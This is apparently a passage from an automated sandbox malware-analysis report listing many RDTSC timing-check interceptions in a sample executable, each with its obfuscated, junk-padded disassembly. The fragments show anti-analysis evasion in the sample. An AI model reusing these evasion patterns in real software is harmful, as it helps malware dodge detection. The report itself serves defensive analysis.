                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57707BF second address: 57707C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57707C3 second address: 57707E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57707E0 second address: 57707E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5770899 second address: 57708D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a leave 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F6644F246F1h 0x00000014 sbb ch, FFFFFFF6h 0x00000017 jmp 00007F6644F246F1h 0x0000001c popfd 0x0000001d mov eax, 0CC24AE7h 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57708D4 second address: 57601DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F664452DAE3h 0x00000009 or ax, C32Eh 0x0000000e jmp 00007F664452DAE9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F664452DAE0h 0x0000001a adc esi, 2630D8A8h 0x00000020 jmp 00007F664452DADBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 retn 0004h 0x0000002c nop 0x0000002d cmp eax, 00000000h 0x00000030 setne al 0x00000033 jmp 00007F664452DAD2h 0x00000035 xor ebx, ebx 0x00000037 test al, 01h 0x00000039 jne 00007F664452DAD7h 0x0000003b sub esp, 04h 0x0000003e mov dword ptr [esp], 0000000Dh 0x00000045 call 00007F6648DFB291h 0x0000004a mov edi, edi 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007F664452DADDh 0x00000054 mov di, cx 0x00000057 popad 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57601DC second address: 5760263 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6644F246EEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ecx, edx 0x00000013 mov si, dx 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F6644F246EFh 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F6644F246EBh 0x00000026 sbb ax, 985Eh 0x0000002b jmp 00007F6644F246F9h 0x00000030 popfd 0x00000031 popad 0x00000032 sub esp, 2Ch 0x00000035 jmp 00007F6644F246EEh 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F6644F246EAh 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760263 second address: 5760272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760272 second address: 576028A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6644F246F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576028A second address: 576028E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576028E second address: 57602B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6644F246EEh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov di, BB30h 0x00000016 mov dh, 5Ah 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57602B0 second address: 57602B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57602B6 second address: 57602BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760331 second address: 5760356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760356 second address: 576036E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576036E second address: 57603BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4529A2D4h 0x00000008 call 00007F664452DADDh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov edi, 00000000h 0x00000016 jmp 00007F664452DADCh 0x0000001b inc ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F664452DADCh 0x00000025 sub ax, B9B8h 0x0000002a jmp 00007F664452DADBh 0x0000002f popfd 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57603BA second address: 57603E2 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 mov si, 2BE7h 0x0000000c pop eax 0x0000000d popad 0x0000000e test al, al 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6644F246F6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57603E2 second address: 576043B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DADBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F664452DD2Fh 0x0000000f pushad 0x00000010 mov bx, ax 0x00000013 push ecx 0x00000014 mov dx, 4742h 0x00000018 pop edx 0x00000019 popad 0x0000001a lea ecx, dword ptr [ebp-14h] 0x0000001d pushad 0x0000001e call 00007F664452DAE4h 0x00000023 mov di, cx 0x00000026 pop eax 0x00000027 mov cx, dx 0x0000002a popad 0x0000002b mov dword ptr [ebp-14h], edi 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F664452DAE4h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576048F second address: 57604EA instructions: 0x00000000 rdtsc 0x00000002 mov cx, E0C5h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx esi, bx 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F6644F246EAh 0x00000014 sbb cl, 00000058h 0x00000017 jmp 00007F6644F246EBh 0x0000001c popfd 0x0000001d jmp 00007F6644F246F8h 0x00000022 popad 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6644F246F7h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760513 second address: 5760519 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760519 second address: 576052E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6644F246F1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576052E second address: 5760532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760532 second address: 576056E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F6644F246F9h 0x00000013 adc ch, FFFFFFC6h 0x00000016 jmp 00007F6644F246F1h 0x0000001b popfd 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576056E second address: 5760579 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov di, ax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760579 second address: 576059E instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 jg 00007F66B53E25F1h 0x0000000e jmp 00007F6644F246EBh 0x00000013 js 00007F6644F2479Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576059E second address: 57605B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57605B9 second address: 576060D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6644F246ECh 0x00000013 jmp 00007F6644F246F5h 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F6644F246EEh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576060D second address: 5760678 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F664452DAE2h 0x00000008 add ch, FFFFFFE8h 0x0000000b jmp 00007F664452DADBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 jne 00007F66B49EB93Dh 0x0000001a jmp 00007F664452DAE6h 0x0000001f mov ebx, dword ptr [ebp+08h] 0x00000022 pushad 0x00000023 movzx eax, bx 0x00000026 mov esi, ebx 0x00000028 popad 0x00000029 lea eax, dword ptr [ebp-2Ch] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F664452DAE7h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760678 second address: 576067C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576067C second address: 5760682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760682 second address: 57606CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F6644F246F0h 0x0000000f push eax 0x00000010 jmp 00007F6644F246EBh 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6644F246F5h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57606CF second address: 57606DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F664452DADCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57606DF second address: 57606E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57606E3 second address: 5760716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov al, dh 0x0000000e pushfd 0x0000000f jmp 00007F664452DAE2h 0x00000014 sub si, 6528h 0x00000019 jmp 00007F664452DADBh 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760716 second address: 57607A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6644F246ECh 0x00000013 sub cx, F2B8h 0x00000018 jmp 00007F6644F246EBh 0x0000001d popfd 0x0000001e mov ecx, 15F15AEFh 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 pushad 0x00000026 call 00007F6644F246F0h 0x0000002b pushfd 0x0000002c jmp 00007F6644F246F2h 0x00000031 sub ah, 00000048h 0x00000034 jmp 00007F6644F246EBh 0x00000039 popfd 0x0000003a pop eax 0x0000003b mov eax, ebx 0x0000003d popad 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F6644F246F1h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57607FA second address: 576081F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F664452DAE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576081F second address: 5760823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760823 second address: 5760827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760827 second address: 576082D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576082D second address: 576003A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 17h 0x00000005 push edx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F66B49EB8F4h 0x00000010 xor eax, eax 0x00000012 jmp 00007F664450720Ah 0x00000017 pop esi 0x00000018 pop edi 0x00000019 pop ebx 0x0000001a leave 0x0000001b retn 0004h 0x0000001e nop 0x0000001f xor ebx, ebx 0x00000021 cmp eax, 00000000h 0x00000024 je 00007F664452DC33h 0x0000002a call 00007F6648DFAF5Dh 0x0000002f mov edi, edi 0x00000031 pushad 0x00000032 mov bx, 3870h 0x00000036 jmp 00007F664452DAE9h 0x0000003b popad 0x0000003c xchg eax, ebp 0x0000003d pushad 0x0000003e movzx ecx, bx 0x00000041 mov ecx, edi 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F664452DADCh 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576003A second address: 576003E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576003E second address: 5760044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760044 second address: 57600BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F6644F246EFh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov esi, 439216DBh 0x00000016 movzx esi, bx 0x00000019 popad 0x0000001a push ebx 0x0000001b pushad 0x0000001c pushad 0x0000001d mov esi, 5D026CCBh 0x00000022 pushfd 0x00000023 jmp 00007F6644F246F0h 0x00000028 adc eax, 1B883FD8h 0x0000002e jmp 00007F6644F246EBh 0x00000033 popfd 0x00000034 popad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushfd 0x00000038 jmp 00007F6644F246F6h 0x0000003d xor ax, 8A38h 0x00000042 jmp 00007F6644F246EBh 0x00000047 popfd 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57600BE second address: 57600E6 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F664452DAE7h 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760144 second address: 5760197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E82Ah 0x00000007 pushfd 0x00000008 jmp 00007F6644F246EBh 0x0000000d adc eax, 468714CEh 0x00000013 jmp 00007F6644F246F9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c leave 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F6644F246F8h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760197 second address: 576019D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 576019D second address: 57601A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57601A3 second address: 57601A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760CD9 second address: 5760CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760CDF second address: 5760CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760CE3 second address: 5760D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F6644F246ECh 0x0000000f cmp dword ptr [75C7459Ch], 05h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760D06 second address: 5760D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760D0A second address: 5760D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760D10 second address: 5760D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760D16 second address: 5760D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760D1A second address: 5760D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760D1E second address: 5760D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F66B53D23BFh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6644F246F9h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760D47 second address: 5760D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760D4D second address: 5760D6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760D6D second address: 5760D73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760E0E second address: 5760E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760E14 second address: 5760E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760E18 second address: 5760E1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760E1C second address: 5760E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 55849819h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007F664452DAE8h 0x00000017 mov ebx, eax 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760E49 second address: 5760E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6644F246EAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760E57 second address: 5760E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760F00 second address: 5760F18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6644F246F4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760F18 second address: 5760F1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760F31 second address: 5760F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760F36 second address: 5760F3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760F3B second address: 5760F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6644F246F7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test al, al 0x0000000e jmp 00007F6644F246F6h 0x00000013 je 00007F66B53C80FAh 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760F7D second address: 5760F83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760F83 second address: 5760FB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6644F246F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp+08h], 00002000h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6644F246EAh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760FB0 second address: 5760FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 5760FB4 second address: 5760FBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 577094C second address: 57709CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 movsx edx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F664452DAE2h 0x00000011 push eax 0x00000012 jmp 00007F664452DADBh 0x00000017 xchg eax, ebp 0x00000018 jmp 00007F664452DAE6h 0x0000001d mov ebp, esp 0x0000001f jmp 00007F664452DAE0h 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 mov cl, 14h 0x00000028 jmp 00007F664452DAE3h 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F664452DAE4h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\gJkNLYV0ax.exeRDTSC instruction interceptor: First address: 57709CE second address: 57709D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
